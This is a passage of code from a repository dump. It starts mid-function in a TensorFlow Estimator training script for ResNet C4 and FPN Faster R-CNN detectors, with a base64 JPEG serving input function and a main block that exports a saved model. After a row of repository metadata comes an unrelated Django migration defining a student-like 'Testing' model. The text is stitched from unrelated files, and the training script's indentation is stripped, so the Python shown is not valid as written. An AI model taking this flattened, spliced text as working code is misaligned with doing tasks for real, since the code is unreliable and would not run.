"""parameter defination part"""
is_train = (mode == tf.estimator.ModeKeys.TRAIN)
resnet_num_blocks = params["RESNET_NUM_BLOCKS"]
num_anchors = params["num_anchors"]
head_dim = params["head_dim"]
resolution = params["resolution"]
num_classes = params["num_classes"]
bbox_reg_weights = params["bbox_reg_weights"]
weight_decay = params["weight_decay"]
learning_rate = params["learning_rate"]
lr_schedule = params["lr_schedule"]
"""model definition part"""
image = image_preprocess(features['image'])
featuremap = resnet_c4_backbone(image, resnet_num_blocks[:3], is_train)
image_shape2d = tf.shape(image)[1:3]
rpn_label_logits, rpn_box_logits = rpn_head(featuremap, head_dim, num_anchors)
if mode != tf.estimator.ModeKeys.PREDICT:
anchors = RPNAnchors(tf_get_all_anchors(), features['anchor_labels'], features['anchor_boxes'])
else:
anchors = RPNAnchors(tf_get_all_anchors(), None, None)
anchors = anchors.narrow_to(featuremap)
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # x1y1x2y2
proposals, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
_C.RPN.TRAIN_PRE_NMS_TOPK if mode == tf.estimator.ModeKeys.TRAIN else _C.RPN.TEST_PRE_NMS_TOPK,
_C.RPN.TRAIN_POST_NMS_TOPK if mode == tf.estimator.ModeKeys.TRAIN else _C.RPN.TEST_POST_NMS_TOPK)
# rpn_size = tf.shape(proposals)[0]
# rpn_boxes = tf.gather(proposals, tf.where(tf.greater(proposals, 0.5)))
proposals = BoxProposals(proposals)
if mode != tf.estimator.ModeKeys.PREDICT:
rpn_loss = rpn_losses(anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
# targets = [features[k] for k in ['boxes', 'gt_labels', 'gt_masks'] if k in features.keys()]
# gt_boxes, gt_labels, *_ = targets
gt_boxes = features['boxes']
gt_labels = features['gt_labels']
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
boxes_on_featuremap = proposals.boxes * (1.0 / _C.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, resolution)
feature_fastrcnn = resnet_conv5(roi_resized, resnet_num_blocks[-1], is_train)
# Keep C5 feature to be shared with mask branch
feature_gap = keras.layers.GlobalAveragePooling2D()(feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(feature_gap, num_classes)
bbox_reg_weights_tensor = tf.convert_to_tensor(bbox_reg_weights, tf.float32)
if mode != tf.estimator.ModeKeys.PREDICT:
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, bbox_reg_weights_tensor)
all_loss = fastrcnn_head.losses()
label_scores = tf.nn.softmax(fastrcnn_label_logits)
decoded_boxes = decoded_output_boxes(proposals, num_classes, fastrcnn_box_logits, bbox_reg_weights_tensor)
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d)
final_boxes, final_scores, final_labels, valid_detections = fastrcnn_predictions_v2(decoded_boxes, label_scores)
# final_boxes, final_scores, final_labels = fastrcnn_predictions(decoded_boxes, label_scores)
global_step = tf.train.get_or_create_global_step()
if mode != tf.estimator.ModeKeys.PREDICT:
trainable_weights = tf.trainable_variables()
weight_loss = 0.0
for i, ele in enumerate(trainable_weights):
if re.search('.*/kernel', ele.name):
weight_loss += tf.reduce_sum(tf.square(ele) * weight_decay)
total_cost = tf.add_n(rpn_loss + all_loss, 'total_cost')
tf.summary.scalar('total_cost', total_cost)
if is_train:
learning_rate = tf.train.piecewise_constant(global_step, lr_schedule,
values=[tf.convert_to_tensor(0.01 * 0.33, tf.float32)] + [
learning_rate * (0.1 ** i) for i in
range(len(lr_schedule))])
opt = tf.train.MomentumOptimizer(learning_rate, 0.9)
# opt = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = opt.minimize(total_cost, global_step)
return tf.estimator.EstimatorSpec(mode, loss=total_cost, train_op=train_op)
else:
return tf.estimator.EstimatorSpec(mode, loss=total_cost)
else:
predictions = {'boxes': final_boxes[0, :valid_detections[0]],
'labels': final_labels[0, :valid_detections[0]],
'scores': final_scores[0, :valid_detections[0]],
'image': features['image'],
# 'rpn_boxes': rpn_boxes,
# 'rpn_size': rpn_size,
'valid_detection': valid_detections}
return tf.estimator.EstimatorSpec(mode, predictions)
def resnet_fpn_model_fn(features, labels, mode, params):
"""parameter definition part"""
is_train = (mode == tf.estimator.ModeKeys.TRAIN)
resnet_num_blocks = params["RESNET_NUM_BLOCKS"]
num_anchors = params["num_anchors"]
head_dim = params["head_dim"]
resolution = params["resolution"]
num_classes = params["num_classes"]
bbox_reg_weights = params["bbox_reg_weights"]
weight_decay = params["weight_decay"]
learning_rate = params["learning_rate"]
lr_schedule = params["lr_schedule"]
"""model definition part"""
image = image_preprocess(features["image"])
c2345 = resnet_fpn_backbone(image, resnet_num_blocks, is_train)
p23456 = fpn_model(c2345)
image_shape2d = tf.shape(image)[1:3]
all_anchors_fpn = tf_get_all_anchors_fpn()
model_rpn_head = RPNHead(_C.FPN.NUM_CHANNEL, len(_C.RPN.ANCHOR_RATIOS))
rpn_outputs = [model_rpn_head(pi) for pi in p23456]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
#debug_op = tf.print({"debug_inf": tf.convert_to_tensor("now in here")})
#with tf.control_dependencies([debug_op]):
# image_shape2d = tf.identity(image_shape2d)
if mode != tf.estimator.ModeKeys.PREDICT:
multilevel_anchors = [RPNAnchors(all_anchors_fpn[i], features['anchor_labels_lvl{}'.format(i + 2)],
features['anchor_boxes_lvl{}'.format(i+2)]) for i in range(len(all_anchors_fpn))]
else:
multilevel_anchors = [RPNAnchors(all_anchors_fpn[i], None,
None) for i in range(len(all_anchors_fpn))]
slice_feature_and_anchors(p23456, multilevel_anchors)
# Multi-Level RPN Proposals
multilevel_pred_boxes = [anchor.decode_logits(logits) for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(multilevel_pred_boxes, multilevel_label_logits, image_shape2d, is_train)
proposals = BoxProposals(proposal_boxes)
gt_boxes = None
gt_labels = None
if mode != tf.estimator.ModeKeys.PREDICT:
losses = multilevel_rpn_losses(multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
gt_boxes = features['boxes']
gt_labels = features['gt_labels']
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, _C.FPN.FRCNN_HEAD_FUNC)
if not _C.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(p23456[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func(roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(head_feature, num_classes)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.convert_to_tensor(bbox_reg_weights, tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(p23456[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, num_classes, mode != tf.estimator.ModeKeys.PREDICT)
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d)
label_scores = fastrcnn_head.output_scores()
# final_boxes, final_scores, final_labels = fastrcnn_predictions(decoded_boxes, label_scores)
final_boxes, final_scores, final_labels, valid_detections = fastrcnn_predictions_v2(decoded_boxes, label_scores)
global_step = tf.train.get_or_create_global_step()
if mode != tf.estimator.ModeKeys.PREDICT:
all_losses = fastrcnn_head.losses()
trainable_weights = tf.trainable_variables()
weight_loss = 0.0
for i, ele in enumerate(trainable_weights):
if re.search('.*/kernel', ele.name):
weight_loss += tf.reduce_sum(tf.square(ele) * weight_decay)
#print_op = tf.print({'rpn_loss': tf.add_n(losses),
# 'frcnn_loss': tf.add_n(all_losses)})
#with tf.control_dependencies([print_op]):
total_cost = tf.add_n(losses + all_losses, "total_cost")
total_cost = tf.add(total_cost, weight_loss, 'all_total_cost')
if is_train:
learning_rate = tf.train.piecewise_constant(global_step, lr_schedule,
values=[tf.convert_to_tensor(0.01 * 0.33 * 0.375, tf.float32)] + [
learning_rate * (0.1 ** i) for i in
range(len(lr_schedule))])
tf.summary.scalar("learning_rate", learning_rate)
opt = tf.train.MomentumOptimizer(learning_rate, 0.9)
# opt = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print(update_ops)
with tf.control_dependencies(update_ops):
train_op = opt.minimize(total_cost, global_step)
return tf.estimator.EstimatorSpec(mode, loss=total_cost, train_op=train_op)
else:
return tf.estimator.EstimatorSpec(mode, loss=total_cost)
else:
predictions = {'boxes': final_boxes[0, :valid_detections[0]],
'labels': final_labels[0, :valid_detections[0]],
'scores': final_scores[0, :valid_detections[0]],
'image': features['image'],
'original_image': features['original_image'],
'h_pre': features['h_pre'],
'w_pre': features['w_pre'],
'h_now': features['h_now'],
'w_now': features['w_now'],
'scale': features['scale'],
'image_id': features.get('image_id', tf.convert_to_tensor(0)),
'valid_detection': valid_detections}
# predictions = {'boxes': final_boxes,
# 'labels': final_labels,
# 'scores': final_scores,
# 'image': features['image'],
# 'original_image': features['original_image'],
# 'h_pre': features['h_pre'],
# 'w_pre': features['w_pre'],
# 'h_now': features['h_now'],
# 'w_now': features['w_now'],
# 'scale': features['scale'],
# 'image_id': features.get('image_id', tf.convert_to_tensor(0))
# }
return tf.estimator.EstimatorSpec(mode, predictions)
model_dict = {"rpn": resnet_c4_model_fn,
"fpn": resnet_fpn_model_fn}
# input = tf.placeholder(dtype=tf.float32, shape=[None, None, 3],
# name="input")
# input = tf.squeeze(input, axis=0)
def serve_input_fn():
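    """Serving input receiver: decodes a base64-encoded JPEG, resizes it with padding so the short edge is 800px (long edge capped at 1312), and exposes the size/scale features the model expects."""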
string_input_data = tf.placeholder(dtype=tf.string, shape=(), name="input")
string_input = tf.io.decode_base64(string_input_data)
input = tf.image.decode_jpeg(string_input)
image_shape = tf.shape(input)
shape2d = image_shape[:2]
h = shape2d[0]
w = shape2d[1]
scale = tf.cast(w / h, tf.float32)
SHORT_IMAGE_EDGE = 800
def true_fn(h, w):
scale = tf.cast(h / w, tf.float32)
new_w = SHORT_IMAGE_EDGE
new_h = tf.minimum(new_w * scale // 32 * 32, 1312)
return tf.cast(new_h, tf.int32), tf.cast(new_w, tf.int32)
def false_fn(h, w):
scale = tf.cast(w / h, tf.float32)
new_h = SHORT_IMAGE_EDGE
new_w = tf.minimum(new_h * scale // 32 * 32, 1312)
return tf.cast(new_h, tf.int32), tf.cast(new_w, tf.int32)
new_height, new_width = tf.cond(tf.greater(h, w), lambda: true_fn(h, w), lambda: false_fn(h, w))
image = tf.image.resize_image_with_pad(input, new_height, new_width)
features = {}
features['image'] = tf.expand_dims(image, 0)
features['image'].set_shape([1, None, None, 3])
features['original_image'] = image_shape
features['h_pre'] = h
features['w_pre'] = w
features['h_now'] = new_height
features['w_now'] = new_width
features['scale'] = scale
return tf.estimator.export.ServingInputReceiver(features, string_input_data)
if __name__ == "__main__":
# tf.enable_eager_execution()
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='rpn', help='training_model')
parser.add_argument('--model_dir', default='./rpn_model_v2', help='where to store the model')
parser.add_argument("--train_filename", default="/home/admin-seu/sss/master_work/data/train.record",
help='train filename')
parser.add_argument("--eval_filename", default="/home/admin-seu/sss/master_work/data/eval.record",
help='eval filename')
parser.add_argument("--test_filename", default="/home/admin-seu/sss/yolo-V3/data/test.txt", help="test_filename")
parser.add_argument("--gpus", default=2, help='num_of_gpus', type=int)
args = parser.parse_args()
params = {}
params["RESNET_NUM_BLOCKS"] = _C.BACKBONE.RESNET_NUM_BLOCKS
params["num_anchors"] = _C.RPN.NUM_ANCHOR
params["head_dim"] = _C.RPN.HEAD_DIM
params["resolution"] = 14
params["num_classes"] = _C.DATA.NUM_CLASS
params["bbox_reg_weights"] = _C.FRCNN.BBOX_REG_WEIGHTS
params["weight_decay"] = _C.TRAIN.WEIGHT_DECAY
params["learning_rate"] = _C.TRAIN.BASE_LR
params["lr_schedule"] = [_C.TRAIN.WARMUP] + _C.TRAIN.LR_SCHEDULE
#dataset = input_fn(args.train_filename, True, _C.MODE_FPN)
#for idx, element in enumerate(dataset):
# print(idx)
# print(element)
# if idx == 10:
# break
if args.gpus > 0:
strategy = distribute.MirroredStrategy(num_gpus=args.gpus)
session_configs = tf.ConfigProto(allow_soft_placement=True)
session_configs.gpu_options.allow_growth = True
config = tf.estimator.RunConfig(train_distribute=strategy, session_config=session_configs,
log_step_count_steps=100, save_checkpoints_steps=40000,
eval_distribute=strategy, save_summary_steps=1000)
estimator = tf.estimator.Estimator(model_dict[args.model], args.model_dir, config,
params)
else:
config = tf.estimator.RunConfig(save_checkpoints_steps=40000, save_summary_steps=1000, log_step_count_steps=100)
        estimator = tf.estimator.Estimator(model_dict[args.model], args.model_dir, config,
params)
train_spec = tf.estimator.TrainSpec(lambda: input_fn(args.train_filename, True, _C.MODE_FPN), max_steps=None)
eval_spec = tf.estimator.EvalSpec(lambda: input_fn(args.eval_filename, False, _C.MODE_FPN), steps=1000)
# tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
estimator.export_saved_model("./export_model_0126", serve_input_fn)
"""
res = estimator.predict(lambda: eval_input_fn(args.test_filename), yield_single_examples=False)
# res = estimator.predict(lambda :input_fn(args.eval_filename, False), yield_single_examples=False)
score_thresh = 0.5
total_steps = 5000
start = time.time()
output_json_file = "./result.json"
json_file = open(output_json_file, 'w')
total_res = []
for idx, ele in enumerate(res):
# image = ele["original_image"].astype(np.uint8)
# image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
print("current image index: ", idx)
# print("boxes: ", ele["boxes"])
# print("labels: ", ele["labels"])
# print("scores: ", ele["scores"])
ele["boxes"] = map_boxes_back(ele["boxes"], ele)
for num_idx, box in enumerate(ele["boxes"]):
# if ele["scores"][num_idx] < score_thresh:
# continue
info_dict = {}
info_dict["image_id"] = int(ele["image_id"])
info_dict["category_id"] = int(ele["labels"][num_idx])
info_dict["bbox"] = [float(box[0]), float(box[1]), float(box[2] - box[0]), float(box[3] - box[1])]
info_dict["score"] = float(ele["scores"][num_idx])
total_res.append(info_dict)
# cv2.rectangle(image, (int(box[0]), int(box[1])), (int(box[2]), int(box[3])), (255, 0, 0), 2)
# cv2.putText(image, '{}: {:.2}'.format(ele["labels"][num_idx], round(ele["scores"][num_idx], 2)), (int(box[0]), int(box[1])), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255), 1)
# cv2.imwrite("./detect_result/{}.jpg".format(idx), image)
#print("boxes: ", ele["boxes"])
#print("labels: ", ele["labels"])
#print("scores: ", ele["scores"])
# print("rpn_boxes: ", ele["rpn_boxes"])
# print("rpn_size: ", ele["rpn_size"])
#print('valid_detection: ', ele["valid_detection"])
if idx == total_steps:
break
json.dump(total_res, json_file)
end = time.time()
print((end - start) / total_steps)
"""
| UTF-8 | Python | false | false | 20,332 | py | 39 | train.py | 32 | 0.604859 | 0.591039 | 0 | 398 | 50.080402 | 185 |
Neo31415/django_learn | 3,255,585,257,799 | 2c036d73ed7735b3737fe87497bed0392fe338f1 | 2f5447b8ef6e9759b512ad2a0c54d2b9528d0ac4 | /intro_to_models_in_django/model_playground/relationship_playground/migrations/0001_initial.py | 08fb405b3515767de877d5a6bf59438d96738630 | []
| no_license | https://github.com/Neo31415/django_learn | 4a39ea62328a56774faffb9d454d352481d21cb6 | df57a554cedba27f8fafc5708eb9c6ca21a4de0b | refs/heads/main | 2023-04-06T00:32:41.686543 | 2021-04-17T19:18:20 | 2021-04-17T19:18:20 | 302,133,051 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.1.5 on 2021-02-13 11:27
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Testing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('roll_number', models.IntegerField(unique=True)),
('address', models.TextField(null=True)),
('phone_number', models.CharField(blank=True, max_length=15, null=True)),
('email', models.CharField(max_length=100, null=True, validators=[django.core.validators.EmailValidator('Invalid Email Adderss')])),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('u', 'Undesclosed')], max_length=1, null=True)),
('slug', models.CharField(max_length=100, null=True, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), 'Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.', 'invalid')])),
],
),
]
| UTF-8 | Python | false | false | 1,278 | py | 33 | 0001_initial.py | 25 | 0.605965 | 0.583203 | 0 | 29 | 42.931034 | 247 |